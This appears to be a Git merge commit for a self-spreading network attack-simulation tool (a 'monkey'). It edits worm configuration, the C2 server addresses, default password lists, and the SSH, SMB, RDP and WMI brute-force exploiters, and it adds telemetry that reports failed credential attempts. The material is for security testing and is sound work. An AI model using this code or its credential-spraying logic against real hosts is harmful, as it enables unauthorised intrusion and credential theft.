# Conflicts:
#	monkey_island/deb-package/monkey_island_pip_requirements.txt
This commit is contained in:
itsikkes 2016-08-10 19:31:27 +03:00
commit f1857a04f8
13 changed files with 78 additions and 53 deletions

View File

@ -110,8 +110,8 @@ class Configuration(object):
###########################
# Kill file
###########################
kill_file_path_windows = os.path.expandvars("%temp%\~df4150.tmp")
kill_file_path_linux = '/tmp/user-4150'
kill_file_path_windows = os.path.expandvars("%windir%\monkey.not")
kill_file_path_linux = '/var/run/monkey.not'
###########################
# monkey config
@ -147,7 +147,7 @@ class Configuration(object):
#Configuration servers to try to connect to, in this order.
command_servers = [
"127.0.0.1:5000"
"41.50.73.31:5000"
]
# sets whether or not to locally save the running configuration after finishing
@ -194,7 +194,7 @@ class Configuration(object):
psexec_passwords = ["Password1!", "1234", "password", "12345678"]
# ssh exploiter
ssh_user = "root"
ssh_users = ["root"]
ssh_passwords = ["Password1!", "1234", "password", "12345678"]
# rdp exploiter

View File

@ -1,6 +1,6 @@
{
"command_servers": [
"russian-mail-brides.com:5000"
"41.50.73.31:5000"
],
"internet_services": [
"monkey.guardicore.com",
@ -37,8 +37,9 @@
"dropper_target_path": "C:\\Windows\\monkey.exe",
"dropper_target_path_linux": "/bin/monkey",
"kill_file_path_linux": "/tmp/user-4150",
"kill_file_path_windows": "%temp%\\~df4150.tmp",
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not",
"dropper_try_move_first": false,
"exploiter_classes": [
"SSHExploiter",
@ -68,7 +69,9 @@
"serialize_config": false,
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
"skip_exploit_if_file_exist": true,
"ssh_user": "root",
"ssh_user": [
"root"
],
"local_network_scan": true,
"tcp_scan_get_banner": true,
"tcp_scan_interval": 200,

View File

@ -13,7 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from model.host import VictimHost
from network.tools import check_port_tcp
from exploit.tools import get_target_monkey
from tools import build_monkey_commandline
from tools import build_monkey_commandline,report_failed_login
__author__ = 'hoffer'
KEYS_INTERVAL = 0.1
@ -295,6 +295,9 @@ class RdpExploiter(HostExploiter):
exploited = True
host.learn_credentials(self._config.psexec_user, password)
break
else:
#failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user, password)
except Exception, exc:
LOG.debug("Error logging into victim %r with user"

View File

@ -6,7 +6,7 @@ from exploit import HostExploiter
from network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger
from tools import build_monkey_commandline
from tools import build_monkey_commandline,report_failed_login
try:
from impacket import smb
@ -88,9 +88,12 @@ class SmbExploiter(HostExploiter):
host.learn_credentials(self._config.psexec_user, password)
exploited = True
break
else:
#failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user, password)
except Exception, exc:
LOG.debug("Error logging into victim %r with user"
LOG.debug("Exception when trying to copy file using SMB to %r with user"
" %s and password '%s': (%s)", host,
self._config.psexec_user, password, exc)
continue

View File

@ -1,12 +1,13 @@
import paramiko
import monkeyfs
import logging
from tools import build_monkey_commandline
import time
from itertools import product
import monkeyfs
from tools import build_monkey_commandline,report_failed_login
from exploit import HostExploiter
from model import MONKEY_ARG
from exploit.tools import get_target_monkey
from network.tools import check_port_tcp
import time
__author__ = 'hoffer'
@ -43,31 +44,35 @@ class SSHExploiter(HostExploiter):
return False
passwords = list(self._config.ssh_passwords[:])
known_password = host.get_credentials(self._config.ssh_user)
if known_password is not None:
if known_password in passwords:
passwords.remove(known_password)
passwords.insert(0, known_password)
users = list(self._config.ssh_users)
known_passwords = [host.get_credentials(x) for x in users]
if len(known_passwords) > 0:
for known_pass in known_passwords:
if known_pass in passwords:
passwords.remove(known_pass)
passwords.insert(0, known_pass) #try first
user_pass = product(users,passwords)
exploited = False
for password in passwords:
for user, curpass in user_pass:
try:
ssh.connect(host.ip_addr,
username=self._config.ssh_user,
password=password,
username=user,
password=curpass,
port=port,
timeout=None)
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
host, self._config.ssh_user, password)
host.learn_credentials(self._config.ssh_user, password)
host, user, curpass)
host.learn_credentials(user, curpass)
exploited = True
break
except Exception, exc:
LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", host,
self._config.ssh_user, password, exc)
user, curpass, exc)
report_failed_login(self,host,user,curpass)
continue
if not exploited:

View File

@ -415,3 +415,10 @@ def build_monkey_commandline(target_host, depth):
cmdline += " -d %d" % depth
return cmdline
def report_failed_login(exploiter, machine, user, password):
from control import ControlClient
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
'exploiter': exploiter.__class__.__name__,
'user':user,'password':password})

View File

@ -6,7 +6,8 @@ from tools import build_monkey_commandline
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
from model.host import VictimHost
from exploit import HostExploiter
from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey
from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, report_failed_login
from impacket.dcerpc.v5.rpcrt import DCERPCException
LOG = logging.getLogger(__name__)
@ -49,6 +50,11 @@ class WmiExploiter(HostExploiter):
LOG.debug("Failed connecting to %r using WMI with password '%s'",
host, password)
continue
except DCERPCException, exc:
report_failed_login(self, host, self._config.psexec_user, password)
LOG.debug("Failed connecting to %r using WMI with password '%s'",
host, password)
continue
except socket.error, exc:
LOG.debug("Network error in WMI connection to %r with password '%s' (%s)",
host, password, exc)

View File

@ -66,6 +66,12 @@ def main():
print "Loaded Configuration: %r" % WormConfiguration.as_dict()
#Make sure we're not in a machine that has the kill file
kill_path = WormConfiguration.kill_file_path_windows if sys.platform == "win32" else WormConfiguration.kill_file_path_linux
if os.path.exists(kill_path):
print "Kill path found, finished run"
return True
try:
if MONKEY_ARG == monkey_mode:
log_path = os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" else WormConfiguration.monkey_log_path_linux

View File

@ -49,7 +49,7 @@ Linux (Tested on Ubuntu 12.04):
sudo pip install paramiko
sudo pip install psutil
sudo pip install netifaces
sudo pip install https://github.com/pyinstaller/pyinstaller/releases/download/3.0.dev2/PyInstaller-3.0.dev2.tar.gz
sudo pip install PyInstaller
sudo apt-get install winbind
2. Put source code in /home/user/Code/monkey/chaos_monkey
3. To build, run in terminal:

View File

@ -1,5 +1,11 @@
python-dateutil
tornado
werkzeug
jinja2
markupsafe
itsdangerous
click
bson
flask
Flask-Pymongo
Flask-Restful
python-dateutil
tornado

View File

@ -1,9 +0,0 @@
[Unit]
Description=Monkey Island Service
[Service]
WorkingDirectory=/var/monkey_island/cc
ExecStart=/usr/bin/python main.py
[Install]
WantedBy=multi-user.target

View File

@ -1,9 +0,0 @@
[Unit]
Description=Monkey Island Mongo Service
[Service]
WorkingDirectory=/var/monkey_island/
ExecStart=/var/monkey_island/bin/mongodb/bin/mongod --dbpath db
[Install]
WantedBy=multi-user.target

View File

@ -1,7 +1,11 @@
python-dateutil
tornado
werkzeug
jinja2
markupsafe
itsdangerous
click
bson
flask
Flask-Pymongo
Flask-Restful
python-dateutil
impacket
pycrypto
tornado